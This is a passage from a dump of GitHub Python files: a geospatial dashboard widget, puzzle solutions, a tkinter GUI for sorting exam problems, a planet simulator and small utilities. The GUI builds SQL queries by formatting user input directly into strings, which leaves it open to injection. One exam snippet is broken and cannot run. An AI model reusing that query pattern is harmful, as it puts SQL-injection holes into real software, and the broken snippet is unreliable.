зачёт!\n# Второй этап: зачёт!\n","repo_name":"RodjerWilko/learning_base_diplom","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"16027718415","text":"from copy import deepcopy\n\nfrom traitlets import link, directional_link\nimport ipyvuetify as v\nimport sepal_ui.sepalwidgets as sw\n\nfrom component.message import cm\nimport component.widget as cw\nimport component.parameter as cp\n\n\nfrom sepal_ui.frontend.resize_trigger import rt\n\n__all__=[\"StatSettingCard\"]\n\nclass StatSettingCard(cw.Card):\n \"\"\"Statistics settings card. It includes all the required inputs to compute\n and display graphics in the statistics dashboard.\n \"\"\"\n \n def __init__(self, model, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.model = model\n\n title = v.CardTitle(children=[cm.graphs.setting.title])\n\n self.w_variable = sw.Select(\n label=cm.graphs.setting.w_variable.label,\n v_model=\"all\",\n items=[{\"text\": \"All variables\", \"value\": \"all\"}]\n + [\n {\"text\": eval(f\"cm.gfc.{var}\"), \"value\": var}\n for var in list(set(cp.gfc_translation.values()))\n ],\n )\n self.w_years = cw.DateSlider(v_model=self.model.sett_timespan).hide()\n self.w_hybasid = sw.Select(\n label=cm.basin.basinid.label,\n v_model=[],\n items=[],\n small_chips=True,\n multiple=True,\n chips=True,\n deletable_chips=True,\n )\n\n self.children = [\n title,\n self.w_variable,\n self.w_hybasid,\n self.w_years,\n rt,\n ]\n\n # Links\n link((self.w_variable, \"v_model\"), (self.model, \"selected_var\"))\n link((self.w_hybasid, \"v_model\"), (self.model, \"selected_hybasid_chart\"))\n\n # UI Events\n self.w_variable.observe(self.show_years, \"v_model\")\n\n # model Events\n self.w_years.on_event(\"change\", self.years_event)\n self.w_hybasid.observe(self.at_least_one, \"v_model\")\n\n # Fill w_hybasid items when the the zonal statistics area calculated\n self.model.observe(self.fill_items ,\"ready\")\n\n def at_least_one(self, change):\n \"\"\"Deactivate the last item when there is only one selectled. Useful\n to avoid showing up graphs without info\"\"\"\n\n widget = change[\"owner\"]\n new_val = change[\"new\"]\n new_items = deepcopy(widget.items)\n\n if len(widget.v_model) == 1:\n\n idx = [\n item[\"index\"] for item in widget.items if item[\"value\"] == new_val[0]\n ][0]\n\n new_items[idx].update(disabled=True)\n elif len(widget.v_model) >= cp.MAX_CATCH_NUMBER:\n\n for item in widget.items:\n if item[\"value\"] not in new_val:\n new_items[item[\"index\"]].update(disabled=True)\n else:\n\n [item.update(disabled=False) for item in new_items]\n \n widget.items = new_items\n\n def fill_items(self, _):\n \"\"\"Fill w_hybasid items once model.ready is True with the inputs step and select the\n first five(5) elements (arbitrary)\"\"\"\n \n method = self.model.method\n if method == \"all\":\n inputs_selection = self.model.hybasin_list\n else: \n inputs_selection = self.model.selected_hybas\n \n \n # Convert into string to graphic purposes \n self.w_hybasid.items = [\n {\"text\": str(val), \"value\": str(val), \"disabled\": False, \"index\": idx}\n for idx, val in enumerate(inputs_selection)\n ]\n\n self.w_hybasid.v_model = [it[\"value\"] for it in self.w_hybasid.items[:5]]\n \n\n def years_event(self, widget, event, data):\n \"\"\"Workaround event (overriding observe) to avoid double calls in slider.\n it will bind selected years with model data.\n \"\"\"\n\n self.model.sett_timespan = data\n\n def show_years(self, change):\n \"\"\"Hide years selection widget when loss is selected\"\"\"\n\n rt.resize()\n\n if change[\"new\"] == \"loss\":\n self.w_years.show()\n else:\n self.w_years.hide()\n\n \n","repo_name":"sepal-contrib/basin-rivers","sub_path":"component/widget/stat_sett_card.py","file_name":"stat_sett_card.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"7109031486","text":"\n#https://leetcode.com/problems/valid-sudoku/submissions/\n\nclass Solution:\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n box_hash = collections.defaultdict(set)\n for i in range(len(board)):\n row_hash = set()\n col_hash = set()\n for j in range(len(board[i])):\n if board[i][j] in row_hash and board[i][j] != \".\":\n return False\n row_hash.add(board[i][j])\n\n if board[j][i] in col_hash and board[j][i] != \".\":\n return False\n col_hash.add(board[j][i])\n\n if board[i][j] in box_hash[(i // 3, j // 3)] and board[i][j] != \".\":\n return False\n box_hash[(i // 3, j // 3)].add(board[i][j])\n\n return True\n","repo_name":"aryan619348/DSA_PRACTICE","sub_path":"Arrays and Hashing/Sudoku.py","file_name":"Sudoku.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3571428757","text":"from tkinter import CENTER, Button, Entry, Label, LabelFrame, Listbox, font, S, N, NE, NW, END, Message, Tk, W, E\nfrom PIL import Image, ImageTk\n\nfrom position import Position\nimport os_tinkering\n\n\n\nLIST_WIDTH = 50 if os_tinkering.getOs() != \"Darwin\" else 25\n\n\nclass GUIMenu:\n\n def __init__(self, app):\n self.widgets = {}\n self.app = app\n self.makeMenu()\n\n\n def addWidget(self, name, widget, position):\n self.widgets[name] = (widget, position)\n\n\n def removeWidget(self, name):\n self.widgets.pop(name)\n\n\n def place(self):\n for widget,pos in self.widgets.values():\n if pos.mode == Position.MODE_RELATIVE:\n widget.place(relx = pos.x, rely = pos.y, anchor = pos.anchor)\n elif pos.mode == Position.MODE_ABSOLUTE:\n widget.place(x = pos.x, y = pos.y, anchor = pos.anchor)\n\n\n def unplace(self):\n for widget, position in self.widgets.values():\n widget.place_forget()\n\n\n def makeMenu():\n pass\n\n\nclass MainMenu(GUIMenu):\n\n def __init__(self, app):\n super().__init__(app)\n\n\n def makeMenu(self):\n\n self.addWidget(\"searchButton\", Button(self.app.gui, text = \"Start\", \n command = lambda : self.app.changeMenu(SearchMenu(self.app), False)), \n Position(0.3, 0.9, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"instructionsButton\", Button(self.app.gui, text = \"Instructions\", \n command = lambda : self.app.changeMenu(InfoMenu(self.app), False)),\n Position(0.7, 0.9, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"menuLabel\", Label(self.app.gui, text = \"Welcome to Problem Sorter\", font = font.Font(size = 30)),\n Position(0.5, 0.1, Position.MODE_RELATIVE, CENTER))\n\n self.image = ImageTk.PhotoImage(Image.open(os_tinkering.IMAGE_PATH))\n\n self.addWidget(\"imageLabel\", Label(image = self.image),\n Position(0.5, 0.5, Position.MODE_RELATIVE, CENTER))\n\n \n\nclass SearchMenu(GUIMenu):\n\n def __init__(self, app):\n super().__init__(app)\n\n\n def makeMenu(self):\n \n # TITLE\n self.addWidget(\"menuLabel\", Label(self.app.gui, text = \"Use/Manage Database\", font = font.Font(size = 26)),\n Position(0.5, 0.1, Position.MODE_RELATIVE, CENTER))\n \n # FRAMES\n self.addWidget(\"themesFrame\", LabelFrame(self.app.gui, text = \"Search Options\", height = 300, width = 400, relief = \"sunken\", labelanchor = N, font = font.Font(size = 18)), \n Position(0.05, 0.15, Position.MODE_RELATIVE, NW))\n self.addWidget(\"resultsFrame\", LabelFrame(self.app.gui, text = \"Results\", height = 300, width = 400, relief = \"sunken\", labelanchor = N, font = font.Font(size = 18)), \n Position(0.95, 0.15, Position.MODE_RELATIVE, NE))\n self.addWidget(\"messageFrame\", LabelFrame(self.app.gui, text = \"Messages\", height = 100, width = 700, relief = \"sunken\", labelanchor = N, font = font.Font(size = 18)),\n Position(0.5, 0.68, Position.MODE_RELATIVE, N))\n\n # LEFTSIDE\n self.addWidget(\"themeListLabel\", Label(self.widgets[\"themesFrame\"][0], text = \"Themes\", font = font.Font(size = 14, underline = True)), \n Position(0.08, 0.08, Position.MODE_RELATIVE, W))\n self.addWidget(\"themeList\", Listbox(self.widgets[\"themesFrame\"][0], height = 10, width = LIST_WIDTH, selectmode = \"multiple\"), \n Position(0.5, 0.85, Position.MODE_RELATIVE, S))\n self.addWidget(\"themeEntry\", Entry(self.widgets[\"themesFrame\"][0], relief = \"sunken\"),\n Position(0.5, 0.1, Position.MODE_RELATIVE, CENTER))\n\n self.initializeThemeList()\n\n # RIGHTSIDE\n self.addWidget(\"resultList\", Listbox(self.widgets[\"resultsFrame\"][0], height = 10, width = LIST_WIDTH), \n Position(0.5, 0.85, Position.MODE_RELATIVE, S))\n self.addWidget(\"resultListLabel\", Label(self.widgets[\"resultsFrame\"][0], text = \"Files\", font = font.Font(size = 14, underline = True)),\n Position(0.08, 0.08, Position.MODE_RELATIVE, W))\n self.addWidget(\"pathEntry\", Entry(self.widgets[\"resultsFrame\"][0], relief = \"sunken\"),\n Position(0.5, 0.1, Position.MODE_RELATIVE, CENTER))\n\n self.addWidget(\"message\", Message(self.app.gui, text = \"Awaiting actions\", width = 600),\n Position(0.2, 0.73, Position.MODE_RELATIVE, NW))\n\n # BUTTONS\n self.addWidget(\"lookupButton\", Button(self.app.gui, text = \"Look up\", \n command = self.lookupCommand),\n Position(0.4, 0.9, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"deleteButton\", Button(self.widgets[\"resultsFrame\"][0], text = \"Remove problem\",\n command = self.removeProblemCommand),\n Position(0.7, 0.925, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"goBack\", Button(self.app.gui, text = \"Go Back\", \n command = lambda : self.app.changeMenu(MainMenu(self.app), False)), \n Position(0.2, 0.9, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"search\", Button(self.app.gui, text = \"Search Files\",\n command = self.searchCommand),\n Position(0.6, 0.9, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"reset\", Button(self.app.gui, text = \"Reset\",\n command = self.resetCommand),\n Position(0.8, 0.9, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"addThemeButton\", Button(self.widgets[\"themesFrame\"][0], text = \"Add theme\",\n command = self.addThemeCommand),\n Position(0.3, 0.925, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"removeThemeButton\", Button(self.widgets[\"themesFrame\"][0], text = \"Remove theme\", \n command = self.removeThemeCommand),\n Position(0.7, 0.925, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"addProblemButton\", Button(self.widgets[\"resultsFrame\"][0], text = \"Add problem\", \n command = self.addProblemCommand),\n Position(0.3, 0.925, Position.MODE_RELATIVE, CENTER))\n\n\n def resetCommand(self):\n\n resultList = self.widgets[\"resultList\"][0]\n themeEntry = self.widgets[\"themeEntry\"][0]\n pathEntry = self.widgets[\"pathEntry\"][0]\n message = self.widgets[\"message\"][0]\n\n themeEntry.delete(0, END)\n pathEntry.delete(0, END)\n message.configure(text = \"Awaiting actions\")\n resultList.delete(0, END)\n\n\n def initializeThemeList(self):\n\n getThemesQuery = \"SELECT name FROM Theme;\"\n themeList = self.widgets[\"themeList\"][0]\n\n themeList.delete(0, END)\n\n for line in self.app.db.execute(getThemesQuery):\n themeList.insert(0, line[0])\n\n \n def addThemeCommand(self):\n \n themeEntry = self.widgets[\"themeEntry\"][0]\n theme = self.widgets[\"themeEntry\"][0].get()\n\n themeEntry.delete(0, END)\n insertThemes = \"INSERT INTO Theme (name) VALUES('{theme}');\"\n self.app.db.execute(insertThemes.format(theme = theme))\n self.initializeThemeList()\n self.widgets[\"message\"][0].configure(text = \"Theme added to database\")\n\n \n def removeThemeCommand(self):\n\n themeList = self.widgets[\"themeList\"][0]\n removeTheme = \"DELETE FROM Theme WHERE name = '{theme}';\"\n removeTheme2 = \"DELETE FROM ProblemTheme WHERE EXISTS (SELECT * FROM Theme WHERE id = themeId AND name = '{theme}');\"\n\n for i in themeList.curselection():\n theme = themeList.get(0, END)[i]\n self.app.db.execute(removeTheme2.format(theme = theme))\n self.app.db.execute(removeTheme.format(theme = theme))\n\n self.initializeThemeList()\n self.widgets[\"message\"][0].configure(text = \"Theme removed from database\")\n\n\n def lookupCommand(self):\n\n if len(self.widgets[\"resultList\"][0].curselection()) <= 0:\n self.widgets[\"message\"][0].configure(text = \"No files selected. Please select a file\")\n return\n\n\n fileName = self.widgets[\"resultList\"][0].get(0, END)[self.widgets[\"resultList\"][0].curselection()[0]]\n os_tinkering.getFile(fileName)\n \n\n def searchCommand(self):\n\n themeList = self.widgets[\"themeList\"][0]\n resultList = self.widgets[\"resultList\"][0]\n resultSet = set()\n\n query = \"SELECT location FROM Problem;\"\n for path in self.app.db.execute(query):\n resultSet.add(path[0])\n \n if len(themeList.curselection()) > 0:\n query = \"SELECT Problem.location FROM Problem JOIN ProblemTheme JOIN Theme ON Theme.id = ProblemTheme.themeID AND Problem.id = ProblemTheme.problemId AND Theme.name = '{theme}'\"\n for i in themeList.curselection():\n theme = themeList.get(0, END)[i]\n tempSet = set()\n for path in self.app.db.execute(query.format(theme = theme)):\n tempSet.add(path[0])\n resultSet = resultSet.intersection(tempSet)\n\n resultList.delete(0, END)\n\n for path in resultSet:\n resultList.insert(0, path)\n\n self.widgets[\"message\"][0].configure(text = \"Presenting search results\")\n\n\n def removeProblemCommand(self):\n\n if len(self.widgets[\"resultList\"][0].curselection()) <= 0:\n self.widgets[\"message\"][0].configure(text = \"No files selected. Please select a file\")\n return\n\n fileName = self.widgets[\"resultList\"][0].get(0, END)[self.widgets[\"resultList\"][0].curselection()[0]]\n\n query1 = \"DELETE FROM ProblemTheme WHERE ProblemTheme.problemId = (SELECT id FROM Problem WHERE location = '{filename}');\"\n query2 = \"DELETE FROM Problem WHERE location = '{filename}';\"\n\n self.app.db.execute(query1.format(filename = fileName))\n self.app.db.execute(query2.format(filename = fileName))\n\n self.searchCommand()\n self.widgets[\"message\"][0].configure(text = \"File successfully removed from the database\")\n\n\n def addProblemCommand(self):\n \n themeList = self.widgets[\"themeList\"][0]\n\n if len(themeList.curselection()) <= 0:\n self.widgets[\"message\"][0].configure(text = \"No themes selected. Please, select a theme from the theme list\")\n return\n\n path = self.widgets[\"pathEntry\"][0].get()\n insertProblem = \"INSERT INTO Problem (location) VALUES('{path}');\".format(path = path)\n insertPT = \"INSERT INTO ProblemTheme (themeId, problemId) VALUES({idT}, {idP});\"\n getThemeIds = \"SELECT id FROM Theme WHERE name = '{theme}';\"\n getProblemId = \"SELECT id FROM Problem WHERE location = '{path}';\".format(path = path)\n\n self.app.db.execute(insertProblem)\n \n themeIds = set()\n\n for i in themeList.curselection():\n theme = themeList.get(0, END)[i]\n themeIds.add(self.app.db.execute(getThemeIds.format(theme = theme))[0][0])\n\n problemId = self.app.db.execute(getProblemId)[0][0]\n\n for i in themeIds:\n self.app.db.execute(insertPT.format(idT = i, idP = problemId))\n\n self.resetCommand()\n\n self.widgets[\"message\"][0].configure(text = \"Database successfully updated\")\n\n \n\n\nclass InfoMenu(GUIMenu):\n\n def __init__(self, app):\n super().__init__(app)\n\n\n def makeMenu(self):\n self.addWidget(\"menuLabel\", Label(self.app.gui, text = \"Instructions\", font = font.Font(size = 26)),\n Position(0.5, 0.1, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"message\", Message(self.app.gui, width = 800, text = \" - You can search for exercises/exams containing exercises that associate with the themes you selected on the theme list by pressing the 'Search' button.\" +\n \" If no theme is selected, the search will retrieve all file paths registered in the database.\" +\n \" When multiple themes are selected, the files presented are the ones which associate with all of the selected themes.\\n\\n\" + \n \" - You can add new themes by entering their name in the left entry box and pressing the 'Add theme' button. Eliminating them is done by selecting from the theme list the themes you desired to remove and hitting the 'Remove theme' button.\\n\\n\" + \n \" - Adding new file paths to the system is done in a similar manner, but you are required to select the themes you want to associate with the file prior to clicking the 'Add problem' button. For one file, multiple themes can be selected.\\n\\n\" + \n \" - If you want to associate a file with one or more new themes, just type the name of the file and proceed as you would to add a new file.\\n\\n\" + \n \" - Reset buttons serve to reset the menu to its initial state, deleting the results of a search for example.\", \n font = font.Font(family = \"Arial\", size = 14)),\n Position(0.1, 0.2, Position.MODE_RELATIVE, NW))\n self.addWidget(\"goBack\", Button(self.app.gui, text = \"Go Back\", \n command = lambda : self.app.changeMenu(MainMenu(self.app), False)), \n Position(0.2, 0.9, Position.MODE_RELATIVE, CENTER))\n\n","repo_name":"marhcouto/problem-sorter","sub_path":"src/gui_menu.py","file_name":"gui_menu.py","file_ext":"py","file_size_in_byte":13326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"5476871425","text":"from collections import Counter\n\n\ninitial_polymer = \"KFVHFSSVNCSNHCPCNPVO\"\n\ninsertion_rules = {\n \"KS\": \"O\",\n \"SP\": \"V\",\n \"OH\": \"F\",\n \"VC\": \"P\",\n \"BO\": \"S\",\n \"CV\": \"H\",\n \"FO\": \"N\",\n \"KV\": \"V\",\n \"OV\": \"B\",\n \"NB\": \"K\",\n \"FS\": \"F\",\n \"KB\": \"N\",\n \"HK\": \"C\",\n \"VP\": \"B\",\n \"SV\": \"S\",\n \"FP\": \"P\",\n \"BS\": \"B\",\n \"BP\": \"K\",\n \"OS\": \"K\",\n \"PB\": \"C\",\n \"HB\": \"H\",\n \"VN\": \"S\",\n \"FB\": \"C\",\n \"OC\": \"N\",\n \"OO\": \"F\",\n \"PC\": \"O\",\n \"FK\": \"K\",\n \"OP\": \"V\",\n \"BH\": \"C\",\n \"NP\": \"C\",\n \"KF\": \"H\",\n \"SK\": \"F\",\n \"HN\": \"O\",\n \"CB\": \"O\",\n \"SN\": \"N\",\n \"VF\": \"S\",\n \"KC\": \"H\",\n \"HF\": \"V\",\n \"NC\": \"P\",\n \"BN\": \"F\",\n \"KO\": \"C\",\n \"PS\": \"B\",\n \"HO\": \"S\",\n \"CH\": \"O\",\n \"KP\": \"K\",\n \"VK\": \"V\",\n \"BB\": \"V\",\n \"BF\": \"P\",\n \"CS\": \"K\",\n \"CN\": \"H\",\n \"PK\": \"C\",\n \"SH\": \"O\",\n \"BC\": \"H\",\n \"FN\": \"N\",\n \"BK\": \"N\",\n \"PN\": \"B\",\n \"PO\": \"O\",\n \"SC\": \"S\",\n \"NO\": \"S\",\n \"KN\": \"O\",\n \"VB\": \"C\",\n \"SF\": \"H\",\n \"FH\": \"C\",\n \"FF\": \"B\",\n \"VO\": \"S\",\n \"PH\": \"F\",\n \"CK\": \"B\",\n \"FC\": \"P\",\n \"VV\": \"F\",\n \"VH\": \"O\",\n \"OF\": \"O\",\n \"HP\": \"K\",\n \"CO\": \"V\",\n \"VS\": \"V\",\n \"SB\": \"F\",\n \"SS\": \"K\",\n \"CF\": \"O\",\n \"OK\": \"V\",\n \"ON\": \"B\",\n \"NS\": \"H\",\n \"SO\": \"B\",\n \"NV\": \"V\",\n \"NH\": \"B\",\n \"NN\": \"K\",\n \"KH\": \"H\",\n \"FV\": \"B\",\n \"KK\": \"N\",\n \"OB\": \"F\",\n \"NK\": \"F\",\n \"CC\": \"S\",\n \"PP\": \"B\",\n \"PF\": \"H\",\n \"HC\": \"P\",\n \"PV\": \"F\",\n \"BV\": \"N\",\n \"NF\": \"N\",\n \"HV\": \"S\",\n \"HH\": \"C\",\n \"HS\": \"O\",\n \"CP\": \"O\",\n}\n\n\ninitial_pairs = {}\nfor i in range(len(initial_polymer) - 1):\n pair = f\"{initial_polymer[i]}{initial_polymer[i+1]}\"\n initial_pairs[pair] = initial_pairs.get(pair, 0) + 1\n\n\ndef compute_next_polymer2(polymer):\n new_polymer = {}\n for pair in polymer:\n if pair in insertion_rules:\n number_of_pair = polymer[pair]\n # Get new element\n new_element = insertion_rules[pair]\n\n # Add pairs with first element and new element\n new_pair_with_first_element = f\"{pair[0]}{new_element}\"\n new_polymer[new_pair_with_first_element] = (\n new_polymer.get(new_pair_with_first_element, 0) + number_of_pair\n )\n\n # Add pairs with new element and second element\n new_pair_with_second_element = f\"{new_element}{pair[1]}\"\n new_polymer[new_pair_with_second_element] = (\n new_polymer.get(new_pair_with_second_element, 0) + number_of_pair\n )\n else:\n new_polymer[pair] = polymer[pair]\n\n return new_polymer\n\n\ndef grow_polymer(initial_polymer, steps):\n initial_pairs = {}\n for i in range(len(initial_polymer) - 1):\n pair = f\"{initial_polymer[i]}{initial_polymer[i+1]}\"\n initial_pairs[pair] = initial_pairs.get(pair, 0) + 1\n\n polymer_map = dict(initial_pairs)\n for i in range(steps):\n polymer_map = compute_next_polymer2(polymer_map)\n\n element_counts = {}\n for pair in polymer_map:\n count = polymer_map[pair]\n element_counts[pair[0]] = element_counts.get(pair[0], 0) + count\n element_counts[pair[1]] = element_counts.get(pair[1], 0) + count\n\n # Add one to account for first and last char\n element_counts[initial_polymer[0]] = element_counts[initial_polymer[0]] + 1\n element_counts[initial_polymer[-1]] = element_counts[initial_polymer[-1]] + 1\n\n element_counts = sorted(list(Counter(element_counts).values()))\n print((element_counts[-1] - element_counts[0]) / 2)\n\n\ngrow_polymer(initial_polymer, 10)\n\ngrow_polymer(initial_polymer, 40)\n","repo_name":"jrochette/recipebook","sub_path":"advent_of_code_day14.py","file_name":"advent_of_code_day14.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31354456096","text":"\"\"\"\nТекстовый файл *.txt содержит только заглавные буквы латинского алфавита (ABC…Z). \nОпредели максимальное количество идущих подряд символов, среди которых нет сочетания символов NO\n\"\"\"\n\nf = open(\"\").readlines()\nm = f.reaplce(\"NO\", \"N O\")\nf = f.split(\" \")\nf = max([len(i) for i in range])\n\nprint(f)","repo_name":"Munkushi/infa-ege","sub_path":"number_24/x.py","file_name":"x.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29788286994","text":"import pygame, math\r\nfrom sys import exit\r\n\r\n# pygame initialisation\r\npygame.init()\r\nWIDTH, HEIGHT = 1000, 1000\r\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\r\npygame.display.set_caption('Plenet Simulator')\r\nFPS = 60\r\n\r\n# colours\r\nWHITE = (255, 255, 255)\r\nYELLOW = (255, 255, 0)\r\nBLUE = (100, 149, 237)\r\nRED = (188, 39, 50)\r\nDARK_GREY = (80, 78, 81)\r\n\r\n# planet class\r\nclass Planet():\r\n AU = 1.496e+8 * 1000\r\n G = 6.67428e-11\r\n SCALE = 15 / AU # 1 AU = 15 px\r\n TIMESTEP = 3600 * 24 * 7 # 1 week\r\n\r\n def __init__(self, x, y, radius, color, mass):\r\n self.x = x\r\n self.y = y\r\n self.radius = radius\r\n self.color = color\r\n self.mass = mass\r\n\r\n self.vel_x = 0\r\n self.vel_y = 0\r\n\r\n self.sun = False\r\n self.distance_to_sun = 0\r\n self.orbit = []\r\n \r\n def draw(self, screen):\r\n x = self.x * self.SCALE + WIDTH//2\r\n y = self.y * self.SCALE + HEIGHT//2\r\n\r\n if len(self.orbit) > 2:\r\n del self.orbit[:-10000]\r\n updated_points = [(x * self.SCALE + WIDTH//2, y * self.SCALE + HEIGHT//2) for x, y in self.orbit]\r\n pygame.draw.lines(screen, self.color, False, updated_points, 2)\r\n\r\n pygame.draw.circle(screen, self.color, (x,y), self.radius)\r\n\r\n def attraction(self, other):\r\n dist_x = other.x - self.x\r\n dist_y = other.y - self.y\r\n distance = math.sqrt(dist_x**2 + dist_y**2)\r\n\r\n if other.sun:\r\n self.distance_to_sun = distance\r\n \r\n force = (self.G * self.mass * other.mass) / distance**2\r\n theta = math.atan2(dist_y, dist_x)\r\n force_x = math.cos(theta) * force\r\n force_y = math.sin(theta) * force\r\n\r\n return force_x, force_y\r\n \r\n def update_pos(self, planets):\r\n ttl_fx = ttl_fy = 0\r\n for planet in planets:\r\n if self == planet:\r\n continue\r\n fx, fy = self.attraction(planet)\r\n ttl_fx += fx\r\n ttl_fy += fy\r\n \r\n self.vel_x += (ttl_fx / self.mass) * self.TIMESTEP\r\n self.vel_y += (ttl_fy / self.mass) * self.TIMESTEP\r\n\r\n self.x += self.vel_x * self.TIMESTEP\r\n self.y += self.vel_y * self.TIMESTEP\r\n self.orbit.append((self.x, self.y))\r\n\r\n\r\n# main\r\ndef main():\r\n clock = pygame.time.Clock()\r\n\r\n # initialise planets\r\n sun = Planet(0, 0, 30, YELLOW, 1.9891 * 10**30)\r\n sun.sun = True\r\n \r\n mercury = Planet(-0.387 * Planet.AU, 0, 16, DARK_GREY, 3.285 * 10**23)\r\n mercury.vel_y = 47.4 * 1000\r\n venus = Planet(-0.7 * Planet.AU, 0, 16, WHITE, 4.867 * 10**24)\r\n venus.vel_y = 35.02 * 1000\r\n earth = Planet(-1 * Planet.AU, 0, 16, BLUE, 5.97219 * 10**24)\r\n earth.vel_y = 29.783 * 1000\r\n mars = Planet(-1.5 * Planet.AU, 0, 12, RED, 6.39 * 10**23)\r\n mars.vel_y = 24.077 * 1000\r\n jupiter = Planet(-5.2 * Planet.AU, 0, 30, 'brown', 1.898 * 10**27)\r\n jupiter.vel_y = 13.06 * 1000\r\n saturn = Planet(-9.5 * Planet.AU, 0, 30, 'antiquewhite3', 5.683 * 10**26)\r\n saturn.vel_y = 9.68 * 1000\r\n uranus = Planet(-19.8 * Planet.AU, 0, 30, BLUE, 8.681 * 10**25)\r\n uranus.vel_y = 6.08 * 1000\r\n neptune = Planet(-30 * Planet.AU, 0, 30, 'blue', 1.024 * 10**26)\r\n neptune.vel_y = 5.43 * 1000\r\n\r\n planets = [sun, mercury, venus, earth, mars, jupiter, saturn, uranus, neptune]\r\n\r\n while True:\r\n # event loop\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n exit()\r\n \r\n if event.type == pygame.KEYDOWN:\r\n # scale\r\n if event.key == pygame.K_UP:\r\n Planet.SCALE += 5 / Planet.AU\r\n elif event.key == pygame.K_DOWN:\r\n Planet.SCALE -= 5 / Planet.AU\r\n \r\n # timestep\r\n if event.key == pygame.K_RIGHT:\r\n Planet.TIMESTEP += 3600 * 24\r\n elif event.key == pygame.K_LEFT:\r\n Planet.TIMESTEP -= 3600 * 24\r\n \r\n screen.fill('black')\r\n\r\n for planet in planets:\r\n if not planet.sun: planet.update_pos(planets)\r\n planet.draw(screen)\r\n\r\n pygame.display.update() \r\n clock.tick(FPS)\r\n\r\nmain()","repo_name":"AryenSinghal/Planets-Simulation","sub_path":"plenets.py","file_name":"plenets.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4902758054","text":"import random\n\n\ndef eight_ball():\n \"\"\"\n Magic eight ball.\n\n :return: A random answer.\n :rtype: str\n \"\"\"\n answers = [\n 'It is certain', 'It is decidedly so', 'without a doubt', 'Yes definitely',\n 'You may rely on it', 'As I see it, yes', 'Most likely', 'Outlook good',\n 'Yes', 'Signs point to yes', 'Reply hazy try again', 'Ask again later',\n 'Better not tell you now', 'Cannot predict now', 'Concentrate and ask again',\n 'Don\\'t count on it', 'My reply is no', 'My sources say no', 'Outlook not so good',\n 'Very doubtful'\n ]\n return random.choice(answers)\n\n\ndef flip_coin():\n \"\"\"\n Flip a coin.\n\n :return: Heads or tails.\n :rtype: str\n \"\"\"\n coin = ['heads', 'tails']\n return random.choice(coin)\n\n\ndef roll_dice():\n \"\"\"\n Roll a 6 sided dice.\n\n :return: A number between 1 and 6.\n :rtype: str\n \"\"\"\n numbers = ['1', '2', '3', '4', '5', '6']\n return random.choice(numbers)\n","repo_name":"nortxort/nortbot","sub_path":"apis/locals_.py","file_name":"locals_.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"15003404084","text":"# Problem:\n# Given an array containing n distinct numbers taken from 0, 1, 2, ..., n, find the one that is missing from the array. \n\nclass Solution(object):\n def missingNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n for elm,expected in zip(sorted(nums),list(range(max(nums)+1))):\n if elm != expected:\n return(expected)\n return(elm+1)","repo_name":"OhMesch/Algorithm-Problems","sub_path":"268-Missing-Number.py","file_name":"268-Missing-Number.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19582429680","text":"def all_even(number_list):\n \"\"\"Return a list of only the even numbers in the input list.\n\n >>> all_even([2, 6, -1, -2])\n [2, 6, -2]\n\n >>> all_even([-1, 3, 5])\n []\n\n \"\"\"\n for num in number_list[:]:\n if num % 2 != 0:\n number_list.remove(num)\n return number_list\n #return ['the wrong thing']\n\nprint (all_even([2, 6, -1, -2]))\nprint (all_even([-1, 3, 5]))","repo_name":"Geeksten/week1_skills-assessment","sub_path":"all_even.py","file_name":"all_even.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10657103902","text":"import numpy as np\nfrom gensim.models import KeyedVectors\nfrom conllu import parse\nfrom sklearn.metrics import log_loss\nfrom keras.models import Model\nfrom keras.layers import Dense, Dropout, Input, LSTM, Bidirectional, Flatten\nfrom keras.optimizers import SGD\nfrom sklearn.preprocessing import label_binarize \n\ndef prepare_data(filename):\n with open(filename, 'r', encoding='utf-8') as f:\n data = f.read()\n trees = parse(data)\n return get_data(trees)\n\ndef process_tree(tree):\n processed_tree = {}\n for word in tree:\n processed_tree[word[\"id\"]] = [word[\"lemma\"].lower(), word[\"head\"], word[\"deprel\"]]\n return processed_tree \n\ndef get_data(trees):\n features, labels = [], []\n for tree in trees:\n processed_tree = process_tree(tree)\n for key, value in processed_tree.items():\n word_lem = value[0]\n head_id = value[1] \n head_lem = processed_tree[head_id][0] if head_id != 0 else \"\"\n dep = value[2]\n if (word_lem in gensim_model and head_lem in gensim_model): \n head_vector = gensim_model[head_lem] if head_id != 0 else 